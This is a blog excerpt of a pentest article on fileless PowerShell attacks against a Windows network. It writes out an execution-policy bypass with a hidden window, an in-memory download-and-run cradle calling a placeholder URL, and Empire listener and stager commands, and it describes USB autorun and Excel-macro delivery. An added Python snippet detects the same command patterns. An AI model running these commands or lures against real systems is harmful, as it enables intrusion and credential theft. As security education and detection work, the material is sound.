
Fileless Malware Is Pretty Much What It Sounds Like

It may seem obvious, but fileless malware is just that: malware that doesn’t copy any files to your system in order to execute. Instead, the payload is injected directly into the memory of a running process and the malware executes in RAM.

This is particularly problematic because typical antivirus software relies on the files that malware places on your hard drive. With nothing on disk to analyze and quarantine or remove, fileless malware gives attackers an extra layer of stealth: the payload executes directly in memory.

However, the definition doesn’t have to be so strict. The delivery stage of these attacks can still look like the phishing and spam campaigns we have all grown used to.

Source: https://sentinelone.com/blogs/fileless-malware-worse-traditional-attack-vectors/, accessed on 09/04/2017 (pt-br).

Below is part of my article published in PenTest Magazine.

In the Reconnaissance step, the contractor provided all the information: every computer runs the Windows operating system, there is a Cisco Meraki firewall with a VPN bridge, and the endpoints run Kaspersky Endpoint Antivirus. The focus of this pentest, as requested by the organization’s owner, was to test the effectiveness of the antivirus, the firewall and employee training.

Running PSnmap, we can resolve DNS names, find open ports and ping hosts, much like the Nmap tool. To install PSnmap, open PowerShell and run Install-Module -Name PSnmap; then a scan with these parameters, psnmap -Comp 192.168.0.1/24 -Dns -Port 23,21,445,3389,25, gathers the information needed for the second step, Scanning. The online computers and open ports are shown in the image below.

[Image: powershell-1]

For the Gaining Access step, we need to understand script execution policies. The pentester may have to bypass a Restricted execution policy; Get-ExecutionPolicy shows the current setting. To run a script silently in the background, the batch file would look something like this: powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file "name_of_script.ps1".

Another option for bypassing the restriction is to download the script from the internet and execute it without writing it to disk, with a command like powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://short-link-to-script')", or to launch it with the Unrestricted policy: PowerShell.exe -ExecutionPolicy UnRestricted -File script-name.ps1.
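The launch patterns above are exactly what a defender hunts for in process-creation telemetry. The following is an added example, not code from the original article: it scores command lines against the switches and download cradle quoted here, runs on constructed sample lines rather than real logs, and assumes that powershell.exe accepts any unambiguous prefix of a switch name (-ep, -w, -noni and so on), which is why the rules are generated rather than hard-coded.

```python
import re

# Constructed sample command lines, as seen in process-creation telemetry
# (Windows Security event 4688 or Sysmon event 1); not real data.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file "name_of_script.ps1"',
    'powershell -nop -c "iex(New-Object Net.WebClient).DownloadString(\'http://short-link-to-script\')"',
    'PowerShell.exe -ExecutionPolicy UnRestricted -File script-name.ps1',
    'powershell.exe -ep bypass -w hidden -noni -nol -f deploy.ps1',  # abbreviated switches
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',  # routine admin use
]

def switch(name, shortest, extra=()):
    """Regex for a powershell.exe switch written as any prefix of NAME at least as
    long as SHORTEST (-ExecutionPolicy, -exec, -ex), plus EXTRA aliases such as -ep.
    That powershell.exe accepts such prefixes is an assumption of this example."""
    forms = {name[:i] for i in range(len(shortest), len(name) + 1)} | set(extra)
    longest_first = "|".join(sorted(forms, key=len, reverse=True))
    return r"(?<![\w-])[-/](?:" + longest_first + r")\b"

# One indicator per launch technique quoted in the article.
RULES = {
    "policy_bypass": re.compile(switch("executionpolicy", "ex", ("ep",)) + r"\s+(?:bypass|unrestricted)", re.I),
    "hidden_window": re.compile(switch("windowstyle", "w") + r"\s+hidden", re.I),
    "noninteractive": re.compile(switch("noninteractive", "noni"), re.I),
    "no_profile": re.compile(switch("noprofile", "nop"), re.I),
    "download_cradle": re.compile(r"\.DownloadString\(|\.DownloadFile\(", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}

# Combinations that justify an alert on their own; a lone -NoProfile does not.
ALERT_COMBINATIONS = (
    {"policy_bypass"},
    {"download_cradle", "invoke_expression"},
    {"hidden_window", "noninteractive"},
)

def classify(cmdline):
    """Return (matched indicator names, alert flag) for one command line."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    return hits, any(combo <= set(hits) for combo in ALERT_COMBINATIONS)

def triage(cmdlines):
    """Keep only command lines that trip an alert combination, with their hits."""
    return [(cmd, classify(cmd)[0]) for cmd in cmdlines if classify(cmd)[1]]

for cmd, hits in triage(SAMPLE_COMMAND_LINES):
    print("ALERT", hits, cmd)
```

The last sample line is deliberately benign so the rules can be checked for false positives as well as hits.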

Empire, Nishang and PowerSploit are excellent script packages and were used to conduct this test.

First, create a server with Empire, running Kali Linux booted from a Samsung Galaxy S4 smartphone via DriveDroid. For this procedure an abandoned computer that was still connected to the network was used; people were told the phone was plugged in to charge its battery. Then, at the command line, these commands were executed: “listeners”, “set Name slx_petter” and “execute”.

[Image: powershell-2]

[Image: powershell-3]

Next, execute “usestager launcher slx_petter” and “execute”, and collect the result.

[Image: powershell-4]

The payload was also executed successfully using a pen drive with autorun and a macro in an Excel document. Since the autorun option was enabled and the pen drive was left in a strategic location, a person moved by curiosity picked it up and plugged it into a computer. One Excel file had been prepared with financial data and another with collaborators’ contacts. The same person opened all the files, ignoring the macro alert.

Afterwards, that person sent the collaborators’ contacts file to someone else, who opened it as well, ignoring the alert. At this point it is possible to interact with the agent, as can be seen below.

[Image: powershell-5]

[Image: powershell-6]

Above, some details of the infected system.

Finally, we can see that this result was reached easily because of configuration errors in the equipment and security software and a lack of proper training. It also demonstrates the effectiveness of an attack using in-memory commands, a technique that bypasses most antivirus products. At this point the attacker could, for example, use Mimikatz, request hashes via SMB relay, bypass UAC, and carry out many other attacks.

Read the complete article at http://periciacomputacional.com/pentesting-with-powershell-in-six-steps/.